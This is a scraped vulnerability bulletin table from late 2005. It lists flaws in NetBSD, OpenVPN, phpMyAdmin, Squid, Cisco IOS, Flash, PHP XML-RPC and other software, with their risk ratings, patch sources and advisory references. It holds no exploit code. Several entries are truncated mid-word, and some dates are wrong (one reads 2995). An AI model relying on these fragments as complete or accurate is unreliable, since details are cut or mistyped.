NetBSD 2.0.2 & prior | Several vulnerabilities have been reported that could lead to a Denial of Service, sensitive information disclosure, or unauthorized access: a vulnerability was reported because the IPsec-AH calculation is always based on the same key in AES-XCBC-MAC; a vulnerability was reported because a malicious user can specify negative offsets when reading the message buffer to read arbitrary kernel memory; a vulnerability was reported in the 'imake(1)' function due to the insecure creation of temporary files; and a vulnerability was reported in the 'sh(1)' command.
Update information available at: http://www.NetBSD. There is no exploit code required. | NetBSD Kernel, Networking & Application Code Denial of Service, Information Disclosure or Elevated Privileges | Medium | Security Tracker Alert ID: 1015132, November 1, 2005 |
OpenVPN 2.0-2.0.2 | Several vulnerabilities have been reported: a format string vulnerability was reported in 'options.c' when handling command options in the 'foreign_option()' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported due to a NULL pointer dereferencing error in the OpenVPN server when running in TCP mode. Updates available at: OpenPKG: SUSE: Debian: Gentoo: Mandriva: Currently we are not aware of any exploits for these vulnerabilities. | OpenVPN Client Remote Format String & Denial of Service | High | Secunia Advisory: SA17376, November 1, 2005 OpenPKG Security Advisory, OpenPKG- SUSE Security Summary Report, Debian Security Advisory, Gentoo Linux Security Advisory, GLSA Mandriva Linux Security Advisory, MDKSA-2005:206, November 8, 2005 |
phpMyAdmin 2.6 .0-2.6.3, 2.5 .0-2.5.7, 2.4 .0, 2.3.2, 2.3.1, 2.2 -2.2.6, 2.1-2.1 .2, 2.0-2.0.5 | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability has been reported in 'libraries/auth/cookie. Upgrades available at: Debian: SUSE: There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPMyAdmin Cross-Site Scripting | Medium | Secunia Advisory: SA16605, August 29, 2005 Debian Security Advisory, DSA 880-1, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
phpMyAdmin 2.x | Several vulnerabilities have been reported: a vulnerability was reported due to insufficient verification of certain configuration parameters, which could let a remote malicious user include arbitrary files; and a Cross-Site Scripting vulnerability was reported in 'left.php,' 'queryframe.php,' and 'server_databases.php' due to insufficient sanitization of unspecified input, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: Gentoo: Debian: SUSE: There is no exploit code required; however, a Proof of Concept exploit has been published. | phpMyAdmin Local File Inclusion & Cross-Site Scripting | Medium | Secunia Advisory: SA17289, October 24, 2005 Gentoo Linux Security Advisory, GLSA 200510-21, October 25, 2005 Debian Security Advisory, DSA 880-1, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
Squid Web Proxy Cache 2.5 & prior | A remote Denial of Service vulnerability has been reported in the 'storeBuffer()' function when handling aborted requests. Patches available at: Gentoo: OpenPKG: Mandriva: Debian: Ubuntu: RedHat: SUSE: SGI: Conectiva: Debian: SUSE: TurboLinux: SCO: Debian: Currently we are not aware of any exploits for this vulnerability. | Squid Aborted Requests Remote Denial of Service | Low | Security Tracker Alert ID: 1014864, September 7, 2005 Gentoo Linux Security Advisory GLSA 200509-06, September 7, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.021, September 10, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:162, September 12, 2004 Debian Security Advisory, DSA 809-1, September 13, 2005 Ubuntu Security Notice, USN-183-1, September 13, 2005 RedHat Security Advisory, RHSA-2005:766-7, September 15, 2005 SUSE Security Announcement, SUSE-SA:2005:053, September 16, 2005 SGI Security Advisory, 20050903-02-U, September 28, 2005 Conectiva Linux Announcement, CLSA-2005:1016, September 28, 2005 Debian Security Advisory, DSA 809-2, September 30, 2005 SUSE Security Summary Report, Turbolinux Security Advisory, TLSA-2005-96, October 3, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 Debian Security Advisory, DSA 809-3, November 7, 2005 |
Squid Web Proxy Cache 2.5 .STABLE1-STABLE 10, 2.4 .STABLE6 & 7, STABLE 2, 2.4, 2.3 STABLE 4&5, 2.1 Patch 2, 2.0 Patch 2 | A remote Denial of Service vulnerability has been reported in '/squid/src/ssl.c' when a malicious user triggers a segmentation fault in the 'sslConnectTimeout()' function. Patches available at: Trustix: OpenPKG: Mandriva: Ubuntu: Debian: RedHat: SUSE: SGI: Conectiva: SUSE: SCO: There is no exploit code required. | Squid 'sslConnect | Low | Security Tracker Alert ID: 1014846, September 2, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0047, September 9, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.021, September 10, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:162, September 12, 2005 Ubuntu Security Notice, USN-183-1, September 13, 2005 Debian Security Advisory, DSA 809-1, September 13, 2005 RedHat Security Advisory, RHSA-2005:766-7, September 15, 2005 SUSE Security Announcement, SUSE-SA:2005:053, September 16, 2005 SGI Security Advisory, 20050903-02-U, September 28, 2005 Conectiva Linux Announcement, CLSA-2005:1016, September 28, 2005 SUSE Security Summary Report, SCO Security Advisory, SCOSA-2005.44, November 1, 2005 |
Squid 2.x | A remote Denial of Service vulnerability has been reported when handling certain FTP server responses. Patches available at: Fedora: Mandriva: SCO: SUSE: There is no exploit code required. | Squid FTP Server Response Handling Remote Denial of Service | Low | Secunia Advisory: SA17271, October 20, 2005 Fedora Update Notifications, Mandriva Linux Security Advisory, MDKSA-2005:195, October 26, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
Sylpheed 2.0-2.0.3, 1.0.0-1.0.5 | A buffer overflow vulnerability has been reported in 'ldif.c' due to a boundary error in the 'ldif_ Upgrades available at: Currently we are not aware of any exploits for this vulnerability. | Sylpheed LDIF Import Buffer Overflow | Medium | Bugtraq ID: 15363, November 9, 2005 |
Sudo 1.x | A vulnerability has been reported in the environment cleaning due to insufficient sanitization, which could let a malicious user obtain elevated privileges. Debian: Mandriva: Ubuntu: SUSE: There is no exploit code required. | Todd Miller Sudo Local Elevated Privileges | Medium | Debian Security Advisory, DSA 870-1, October 25, 2005 Mandriva Linux Security Advisory, MDKSA-2005:201, October 27, 2005 Ubuntu Security Notice, USN-213-1, October 28, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
UW-imapd imap-2004c1 | A buffer overflow has been reported in UW-imapd that could let remote malicious users cause a Denial of Service or execute arbitrary code. Upgrade to version imap-2004g: Trustix: Debian: Gentoo: SUSE: Mandriva: Slackware: Currently we are not aware of any exploits for this vulnerability. | UW-imapd Denial of Service and Arbitrary Code Execution | High | Secunia, Advisory: SA17062, October 5, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0055, October 7, 2005 Debian Security Advisory, DSA 861-1, October 11, 2005 Gentoo Linux Security Advisory, GLSA 200510-10, October 11, 2005 SUSE Security Summary Report, SUSE-SR:2005:023, October 14, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:189 & 194, October 21 & 26, 2005 Slackware Security Advisory, SSA:2005-310-06, November 7, 2005 |
up-imapproxy 1.2.4, 1.2.3 | A format string vulnerability has been reported in the 'ParseBannerAnd Debian: A Proof of Concept exploit script has been published. | up-imapproxy Format String | High | Debian Security Advisory DSA 852-1, October 9, 2005 Security Focus, Bugtraq ID: 15048, November 3, 2005 |
VERITAS Cluster Server 2.x, 3.x, 4.x, Storage Foundation 2.x, 3.x, 4.x, Storage Foundation Cluster File System 4.x, Storage Foundation for Database (DB2, Oracle and Sybase) 3.x, 4.x, Storage Foundation for Oracle Real Application Clusters (RAC) 3.x, 4.x | A buffer overflow vulnerability has been reported in the 'ha' command when handling the 'VCSI18N_LANG' environmental variable, which could let a malicious user execute arbitrary code with root privileges. Patches available at: Currently we are not aware of any exploits for this vulnerability. | VERITAS Cluster Server for UNIX Buffer Overflow | High | Symantec Security Advisory, SYM05-023, November 8, 2005 |
Zope 2.6-2.8.1 | A vulnerability has been reported in 'docutils' due to an unspecified error and affects all instances which exposes 'Restructured Hotfix available at: Gentoo: SUSE: Currently we are not aware of any exploits for this vulnerability. | Zope 'Restructured | Not Specified | Zope Security Alert, October 12, 2005 Gentoo Linux Security Advisory, GLSA 200510-20, October 25, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
| Multiple Operating Systems - Windows / UNIX / Linux / Other | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attack Scripts | Common Name / CVE Reference | Risk | Source |
| Apache | A vulnerability has been reported in Apache which can be exploited by remote malicious users to smuggle http requests. Conectiva: Fedora: Mandriva: http://security.ubuntu.com/ TurboLinux: SGI: SuSE:
href="ftp://ftp.suse.com/pub/suse/"> Debian: Ubuntu: SGI: IBM has released fixes for Hardware Management Console addressing this issue. Users should contact IBM for further information. Trustix: Slackware: Currently we are not aware of any exploits for this vulnerability. | Apache HTTP Request Smuggling Vulnerability CVE-2005-1268 | Medium | Secunia, Advisory: SA14530, July 26, 2005 Conectiva, CLSA-2005:982, July 25, 2005 Fedora Update Notification Mandriva Linux Security Update Advisory, MDKSA-2005:129, August 3, 2005 Ubuntu Security Notice, USN-160-1, August 04, 2005 Turbolinux Security Advisory, TLSA-2005-81, August 9, 2005 SGI Security Advisory, 20050802-01-U, August 15, 2005 SUSE Security Announcement, SUSE-SA:2005:046, August 16, 2005 Debian Security Advisory DSA 803-1, September 8, 2005 Ubuntu Security Notice, USN-160-2, September 07, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Security Focus, Bugtraq ID: 14106, September 21, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 Slackware Security Advisory, SSA:2005-310-04, November 7, 2005 |
Tomcat 5.5-5.5.12 | A remote Denial of Service vulnerability has been reported due to the inefficient generation of directory listing for web directories that have a large number of files. No workaround or patch available at time of publishing. There is no exploit code required. | Apache Tomcat Remote Denial of Service | Low | Security Tracker Alert ID: 1015147, November 3, 2005 |
QuickTime Player 7.0-7.0.2, 6.5-6.5.2, 6.1, 5.0.2, 6, | Multiple vulnerabilities have been reported: an integer overflow vulnerability was reported when handling a 'Pascal' style string loading a '.mov' video file, which could let a remote malicious user cause a Denial of Service and potentially execute arbitrary code; an integer overflow vulnerability was reported when handling certain movie attributes when loading a '.mov' video file, which could let a remote malicious user potentially execute arbitrary code; a vulnerability was reported due to a NULL pointer dereferencing error when handling certain missing video file movie attributes, which could let a remote malicious user cause a Denial of Service; and a vulnerability was reported in the QuickTime PictureViewer due to a boundary error when decompressing PICT data, which could let a remote malicious user overwrite memory and potentially execute arbitrary code. Updates available at: Currently we are not aware of any exploits for these vulnerabilities. | Apple QuickTime Player Integer & Buffer Overflows | High | Security Tracker Alert ID: 1015152, November 4, 2005 |
ATutor 1.5.1 pl2 | An SQL injection vulnerability has been reported in 'registration.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | ATutor SQL Injection | Medium | Security Focus, Bugtraq ID: 15355, November 8, 2005 |
vCard Pro 3.1 | An SQL injection vulnerability has been reported in 'addrbook.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Belchior Foundry vCard Pro SQL Injection | Medium | Security Focus, Bugtraq ID: 15254, November 1, 2005 |
Cisco 4000 Series Airespace Wireless LAN Controller 3.1.59 .24, 2000 Series Airespace Wireless LAN Controller 3.1.59 .24, | A vulnerability has been reported in controllers that are in the Lightweight Access Point Protocol (LWAPP) mode of operation because unencrypted traffic is accepted even when configured to encrypt traffic, which could let an unauthorized remote malicious user send unencrypted network packets to a secure network by spoofing the MAC address of another host that has already authenticated. Upgrade information available at: This could be exploited with a publicly available packet crafting or MAC address spoofing utility. | Cisco Airespace Wireless LAN Controller Unencrypted Connections | Medium | Cisco Security Advisory: 68034, November 2, 2005 |
Cisco IOS 10.x, 11.x, 12.x, R11.x, R12.x | A buffer overflow vulnerability has ben reported when validating whether certain system memory has been corrupted by a heap-based buffer overflow before the internal operating system timers execute code, which could let a remote malicious user execute arbitrary code. Update information available at: Currently we are not aware of any exploits for this vulnerability. | Cisco IOS System Timers Heap Buffer Overflow | High | Cisco Security Advisory: 68064 Rev 1.0-1.2, Updated November 4, 2005 |
CiscoWorks Management Center for IPS Sensors (IPSMC) 2.1 | A vulnerability has been reported due to an error in the Cisco IOS IPS (Intrusion Prevention System) configuration file that is generated by the IPS MC and deployed to IOS IPS devices, which could potentially allow malicious traffic to pass through. Patch information available at: Rev 1.1: Updated information in the Software Versions and Fixes section. There is no exploit code required. | Cisco Management Center for IPS Sensors Signature Disable | Medium | Cisco Security Advisory, 68065, November 1, 2005 Cisco Security Advisory, 68065 Rev1.1, Updated November 3, 2005 |
CuteNews 1.4.1 | A Directory Traversal vulnerability has been reported in 'show_archives.php' and 'show_news.php' due to insufficient verification of the 'template' parameter before used to include files, which could let a remote malicious user obtain sensitive information and execute arbitrary PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | CutePHP CuteNews Directory Traversal & PHP Code Execution | High | Security Focus, Bugtraq ID: 15295, November 3, 2005 |
Elite Forum 1.0 .0.0 | A vulnerability has been reported due to insufficient sanitization of input when posting a reply, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; | Elite Forum HTML Injection | Medium | h4cky0u.org Advisory, HYSA-2005-009, November 1, 2005 |
F-Prot Antivirus for Windows, Solaris, Linux and BSD 4.4.2, 3.12 d, 3.12 b, | A vulnerability has been reported due to insufficient scanning of decompressed ZIP files that have a header value greater than 15, which could let a remote malicious user bypass the scanning engine. No workaround or patch available at time of publishing. There is no exploit code required. | F-Prot Antivirus ZIP Attachment Version Scan Bypass | Medium | Security Tracker Alert ID: 1015148, November 3, 2005 |
Internet Gatekeeper 6.4.0-6.42, Anti-Virus for MS Exchange 6.40 | A Directory Traversal vulnerability has been reported in the Web Console, which could let a remote malicious user obtain sensitive information. Update information available at: There is no exploit code required. | F-Secure Web Console Directory Traversal | Medium | F-Secure Security Bulletin FSC-2005-2, November 2, 2005 |
Gallery 2.4 | An SQL injection vulnerability has been reported in 'ShowGallery.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Gallery SQL Injection | Medium | Security Focus, Bugtraq ID: 15313, November 4, 2005 |
Lotus Domino 6.5.0-6.5.4, 6.0-6.0.4, Lotus Domino Web Access (iNotes) 6.x | Multiple vulnerabilities have been reported: a remote Denial of Service vulnerability was reported when handling mail rules creation in DWA (Domino Web Access); a remote Denial of Service vulnerability was reported in the Out-Of-Office Agent when processing a message with a From field greater than 256 characters; an unspecified vulnerability was reported in Agents and in MIME to CD conversion; a remote Denial of Service vulnerability was reported when handling invalid HTTP addresses in DWA due to an unspecified error; a remote Denial of Service vulnerability was reported in the mail router when handling a document in the user's mail box that contains an invalid attachment; and a remote Denial of Service vulnerability was reported in Update Task when updating views in the Domino Directory. Updates available at: Some of these vulnerabilities do not require exploit code. | IBM Lotus Domino/Notes Multiple Vulnerabilities | Low | Secunia Advisory: SA17429, November 4, 2005 |
Tivoli Access Manager for Business Integration 5.x, Tivoli Access Manager for e-business 5.x, Tivoli Access Manager for Operating Systems 5.x, Tivoli Directory Integrator 5.x, 6.x, Tivoli Directory Server 5.x, 6.x, Tivoli Federated Identity Manager 6.x, Tivoli Identity Manager 4.x | A vulnerability has been reported in the server's 'slapd' daemon due to an unspecified error, which could let a remote malicious user obtain unauthorized access and change, modify and/or delete directory data. Update information available at: Currently we are not aware of any exploits for this vulnerability. | IBM Tivoli Directory Server Security Bypass | Medium | IBM Security Advisory, November 9, 2005 |
Websphere Application Server 5.1.1 .4, 5.1.1 .3 | A vulnerability has been reported in the log file when tracing for the session manager is enabled because the 'QueryString' is logged when a URL is encoded, which could let a remote malicious user obtain sensitive information. Update information available at: There is no exploit code required. | IBM WebSphere Application Server Information Disclosure | Medium | Security Tracker Alert ID: 1015134, November 2, 2005 |
ibProArcade 2.5.2 | An SQL injection vulnerability has been reported in the 'report' module due to insufficient sanitization of input in the 'user' parameter in 'index.php' before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. Update available at: A Proof of Concept exploit has been published. | ibProArcade Module SQL Injection | Medium | Secunia Advisory: SA17457, November 7, 2005 |
Invision Board 2.1 | Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported due to insufficient of unspecified input in the administration interface before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; and multiple HTML injection vulnerabilities were reported due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | Invision Power Board Multiple Cross-Site Scripting & HTML Injection | Medium | Security Focus, Bugtraq ID: 15344 & 15345, November 7, 2005 |
VBulletin 3.0-3.0.9, 2.3.0-2.3.4, 2.2.0-2.2.9, 2.0.3, 2.0 rc 2& rc 3, 1.0.1 lite | An input validation vulnerability has been reported in the image upload handling, which could let a remote malicious user execute arbitrary HTML and script code. Update available at: There is no exploit code required. | vBulletin Image Upload Input Validation | Medium | Security Focus, Bugtraq ID: 15296, November 3, 2005 |
FlatFrag 0.3 & prior | Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported due to insufficient bounds checking of user-supplied data before coping to an insufficiently sized memory buffer, which could let a remote malicious user execute arbitrary code: and a remote Denial of Service vulnerability was reported due to an attempt to dereference a NULL pointer. No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | Johannes F. Kuhlmann FlatFrag Remote Buffer Overflow & Denial of Service | High | Security Focus, Bugtraq ID: 15287, November 2, 2005 |
JPortal Web Portal 2.3.1, 2.2.1 | Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | JPortal Multiple SQL Injection | Medium | Security Focus, Bugtraq ID: 15324, November 4, 2005 |
Flash 7.0.19 .0, 7.0 r19, 6.0.79 .0, 6.0.65 .0, 6.0.47 .0, 6.0.40 .0, 6.0.29 .0, 6.0 | A vulnerability has been reported due to insufficient validation of the frame type identifier that is read from a SWF file, which could let a remote malicious user execute arbitrary code. Update information available at: An exploit has been published. | Macromedia Flash Array Index Remote Arbitrary Code Execution | High | Macromedia Security Advisory, MPSB05-07, November 5, 2005 |
Flash 7.0.19 .0 & prior | An input validation vulnerability has been reported in 'ActionDefineFunction' due to an error for a critical array index value, which could let a remote malicious user cause a Denial of Service or execute arbitrary code. Update information available at: A Proof of Concept exploit has been published. | Macromedia Flash Input Validation | High | Macromedia Security Bulletin, MPSB05-07, November 7, 2005 |
Netscape 8.0.3.3, 7.2;
| A buffer overflow vulnerability has been reported due to an error when handling IDN URLs that contain the 0xAD character in the domain name, which could let a remote malicious user execute arbitrary code. Patches available at: RedHat: http://rhn.redhat.com/ Fedora: Ubuntu: Gentoo: Slackware: Gentoo: Conectiva: Fedora: Debian: TurboLinux: Mandriva: HPSBUX01231 Rev1: Netscape: Debian: http://security.debian. HPSBUX01231 Rrev.2: HP-UX Mozilla Remote Unauthorized Execution of Privileged Code or Denial of Service (DoS)) is available detailing information on the availability of version 1.7.12.01 of Mozilla for various HP platforms. Users should see the referenced advisory or contact HP for further information. A Proof of Concept exploit script has been published. | Mozilla/Netscape/ Firefox Browsers Domain Name Buffer Overflow | High | Security Focus, Bugtraq ID: 14784, September 10, 2005 RedHat Security Advisories, 769-8 & RHSA-2005:768-6, September 9, 2005 Fedora Update Notifications, Ubuntu Security Notice, USN-181-1, September 12, 2005 Gentoo Linux Security Advisory GLSA 200509-11, September 18, 2005 Security Focus, Bugtraq ID: 14784, September 22, 2005 Slackware Security Advisory, SSA:2005-269-01, September 26, 2005 Gentoo Linux Security Advisory [UPDATE], GLSA 200509-11:02, September 29, 2005 Conectiva Linux Announcement, CLSA-2005:1017, September 28, 2005 Fedora Update Notifications, Debian Security Advisory, DSA 837-1, October 2, 2005 Turbolinux Security Advisory, TLSA-2005-93, October 3, 2005 HP Security Bulletin, Mandriva Linux Security Update Advisory, MDKSA-2005:174, October 6, 2005 HP Security Bulletin, Debian Security Advisories, DSA 866-1 & 868-1, October 20, 2005 HP Security Bulletin, |
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2; | A vulnerability has been reported in Ethereal, IRC Protocol Dissector, that could let remote malicious users cause a Denial of Service. Mandriva: Gentoo: SUSE: Conectiva: Currently we are not aware of any exploits for this vulnerability. | Ethereal Denial of Service | Low | Mandriva Linux Security Advisory, MDKSA-2005:193-1, October 26, 2005 Gentoo Linux Security Advisor, GLSA 200510-25, October 30, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Conectiva Security Announce-ment, CLSA-2005:1043, November 8, 2005 |
Mozilla Firefox 1.5 beta 1 & beta 2, 1.0-1.0.7, 0.10.1, 0.10, 0.9-0.9.3, 0.8, Firefox Preview Release; Browser 1.8 Alpha 1-Alpha 4, 1.7-1.7.12, 1.6, 1.5.1, 1.5, 1.4.4, 1.4.2, 1.4.1, 1.4 1 & b, 1.4, 1.3.1, 1.3, 1.2.1, 1.2, Alpha & Beta, 1.1, Alpha & Beta, 1.0-1.0.2, 0.9.48, 0.9.35, 0.9.2-0.9.9, 0.8, M16, M15; KDE Konqueror Embedded 0.1, Konqueror 3.3-3.3.2, 3.2.3, 3.2.2 -6, 3.2.1, 3.1-3.1.5, 3.0.5 b, 3.0.5, 3.0- 3.0.3, 2.2.2, 2.2.1, 2.1.2, 2.1.1 | A vulnerability has been reported due to a failure to ensure that cookies are properly associated to domain names, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required. | Multiple Vendor Web Browser Cookie Hostname Information Disclosure | Medium | Security Focus, Bugtraq ID: 15331, November 4, 2005 |
PHPXMLRPC 1.1.1; | A vulnerability has been reported in XML-RPC due to insufficient sanitization of certain XML tags that are nested in parsed documents being used in an 'eval()' call, which could let a remote malicious user execute arbitrary PHP code.
PHPXMLRPC : Pear: Drupal: eGroupWare: MailWatch: Nucleus: RedHat: Ubuntu: Mandriva: Gentoo: http://security.gentoo http://security.gentoo. Fedora: Debian: SUSE: Gentoo: http://security.gentoo. Slackware: Debian: SGI: Slackware: Gentoo: Debian: Debian: Conectiva: b2evolution: There is no exploit code required. | PHPXMLRPC and PEAR XML_RPC Remote Arbitrary Code Execution | High | Security Focus, Bugtraq ID 14560, August 15, 2995 Security Focus, Bugtraq ID 14560, August 18, 2995 RedHat Security Advisory, RHSA-2005:748-05, August 19, 2005 Ubuntu Security Notice, USN-171-1, August 20, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:146, August 22, 2005 Gentoo Linux Security Advisory, GLSA 200508-13 & 14, & 200508-18, Fedora Update Notifications, Debian Security Advisory, DSA 789-1, August 29, 2005 SUSE Security Announcement, SUSE-SA:2005:049, August 30, 2005 Gentoo Linux Security Advisory, GLSA GLSA 200508-20& 200508-21, August 30 & 31, 2005 Slackware Security Advisory, SSA:2005-242-02, August 31, 2005 Debian Security Advisory, DSA 798-1, September 2, 2005 SUSE Security Announcement, SUSE-SA:2005:051, September 5, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Slackware Security Advisories, SSA:2005-251-03 & 251-04, September 9, 2005 Gentoo Linux Security Advisory, GLSA 200509-19, September 27, 2005 Debian Security Advisory, DSA 840-1, October 4, 2005 Debian Security Advisory, DSA 842-1, October 4, 2005 Conectiva Linux Announcement, CLSA-2005:1024, October 7, 2005 Security Focus, Bugtraq ID: 14560, November 7, 2005 |
PunBB 1.2.1-1.2.9; | Several vulnerabilities have been reported: a HTML injection vulnerability was reported when uploading images due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported because addresses can be hidden that use the 'X_FORWARDED_FOR' field in the HTTP header, which could let a remote malicious user spoof the origin; and an unspecified information disclosure vulnerability was reported.
PunBB: Blog:CMS: There is no exploit code required. | PunBB/Blog:CMS HTML Injection, Origin Spoof & Information Disclosure | Medium | Security Focus, Bugtraq IDs: 15322, 15326, & 15328, November 4, 2005 |
RedHat Fedora Core4, Core3; PHP 5.0.4, 4.3.9 | A remote Denial of Service vulnerability has been reported when parsing EXIF image data contained in corrupt JPEG files. Fedora: Currently we are not aware of any exploits for this vulnerability. | PHP Group Exif Module Remote Denial of Service | Low | Fedora Update Notifications, FEDORA-2005-1061 & 1062, November 8, 2005 |
RedHat Fedora Core4, Core3; | Several vulnerabilities have been reported: a remote Denial of Service vulnerability was reported in the ISAKMP, FC-FCS, RSVP, and ISIS LSP dissectors; a remote Denial of Service vulnerability was reported in the IrDA dissector; a buffer overflow vulnerability was reported in the SLIMP3, AgentX, and SRVLOC dissectors, which could let a remote malicious user execute arbitrary code; a remote Denial of Service vulnerability was reported in the BER dissector; a remote Denial of Service vulnerability was reported in the SigComp UDVM dissector; a remote Denial of service vulnerability was reported due to a null pointer dereference in the SCSI, sFlow, and RTnet dissectors; a vulnerability was reported because a remote malicious user can trigger a divide by zero error in the X11 dissector; a vulnerability was reported because a remote malicious user can cause an invalid pointer to be freed in the WSP dissector; a remote Denial of Service vulnerability was reported if the 'Dissect unknown RPC program numbers' option is enabled (not the default setting); and a remote Denial of Service vulnerability was reported if SMB transaction payload reassembly is enabled (not the default setting). Upgrades available at: Fedora: RedHat: Mandriva: Avaya: Gentoo: SUSE: An exploit script has been published. | Ethereal Multiple Protocol Dissector Vulnerabilities CVE-2005-3184 | High | Ethereal Security Advisory, enpa-sa-00021, October 19, 2005 Fedora Update Notifications, RedHat Security Advisory, RHSA-2005:809-6, October 25, 2005 Mandriva Linux Security Advisory, MDKSA-2005:193, October 25, 2005 Avaya Security Advisory, ASA-2005-227, October 28, 2005 Gentoo Linux Security Advisory, GLSA 200510-25, October 30, 2005 Mandriva Linux Security Advisory, MDKSA-2005:193-2, October 31, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
University of Kansas Lynx 2.8.6 dev.1-dev.13, 2.8.5 dev.8, 2.8.5 dev.2-dev.5, 2.8.5, 2.8.4 rel.1, 2.8.4, 2.8.3 rel.1, 2.8.3 pre.5, 2.8.3 dev2x, 2.8.3 dev.22, 2.8.3, 2.8.2 rel.1, 2.8.1, 2.8, 2.7; | A buffer overflow vulnerability has been reported in the 'HTrjis()' function when handling NNTP article headers, which could let a remote malicious user execute arbitrary code. University of Kansas Lynx: Gentoo: Ubuntu: RedHat: Fedora: Mandriva: Conectiva: Trustix: SGI: Mandriva: Debian: http://security.debian. Ubuntu: SUSE: Slackware: SCO: A Proof of Concept Denial of Service exploit script has been published. | Lynx 'HTrjis()' NNTP Remote Buffer Overflow | High | Gentoo Linux Security Advisory, GLSA 200510-15, October 17, 2005 Ubuntu Security Notice, USN-206-1, October 17, 2005 RedHat Security Advisory, RHSA-2005:803-4, October 17, 2005 Fedora Update Notifications, Mandriva Linux Security Update Advisory, MDKSA-2005:186, October 18, 2005 Conectiva Linux Announcement, CLSA-2005:1037, October 19, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 SGI Security Advisory, 20051003-01-U, October 26, 2005 Mandriva Linux Security Advisory, MDKSA-2005:186-1, October 26, 2005 Debian Security Advisories, DSA 874-1 & 876-1, October 27, 2005 Ubuntu Security Notice, USN-206-2, October 29, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-03, November 7, 2005 SCO Security Advisory, SCOSA-2005.47, November 8, 2005 |
Xoops 2.0.10-2.0.12, 2.0.9 .3, 2.0.9.2, 2.0.5-2.0.5.2, 2.0- 2.0.3; | A vulnerability was reported due to insufficient sanitization of the 'eval()' call, which could let a remote malicious user execute arbitrary PHP code. Drupal: Mandriva: Pear: PhpMyFaq: S9Y Serendipity: Trustix:
href="http://http.trustix.org/pub/trustix/updates/"> WordPress: XML-RPC: Xoops: Gentoo: http://security.gentoo.org/ http://security.gentoo.org/ http://security.gentoo.org/ Fedora: Ubuntu: Debian: http://security.debian.org/ http://security.debian.org/ SGI: SuSE: Trustix: Debian: SUSE: MAXdev MD-Pro Content Management: b2evolution: Exploit scripts have been published. | Multiple Vendors XML-RPC for PHP Remote Code Injection | High | Security Focus, 14088, June 29, 2005 Gentoo Linux Security Advisory, GLSA 200507-01, July 3, 2005 Fedora Update Notifications, Ubuntu Security Notice, USN-147-1 & USN-147-2, July 05 & 06, 2005 Gentoo Linux Security Advisory, GLSA 200507-06, July 6, 2005 Gentoo Linux Security Advisory, GLSA 200507-07, July 10, 2005 SuSE Security Announcement, SUSE-SA:2005:041, July 8, 2005 Debian Security Advisories, DSA 745-1, 747-1, & DSA 746-1, July 10 & 13, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0036, July 14, 2005 SGI Security Advisory, 20050703-01-U, July 15, 2005 Gentoo Linux Security Advisory, GLSA 200507-15, July 15, 2005 Debian Security Advisory, DSA 789-1, August 29, 2005 SUSE Security Announcement, SUSE-SA:2005:049, August 30, 2005 Security Focus, Bugtraq ID: 14088, November 7, 2005 |
OSTE 1.x | A vulnerability has been reported in 'index,php' due to insufficient verification of the 'page' and 'site' parameters before including files, which could let a remote malicious user execute arbitrary remote PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | OSTE File Inclusion Vulnerability | High | Secunia Advisory: SA17493, November 8, 2005 |
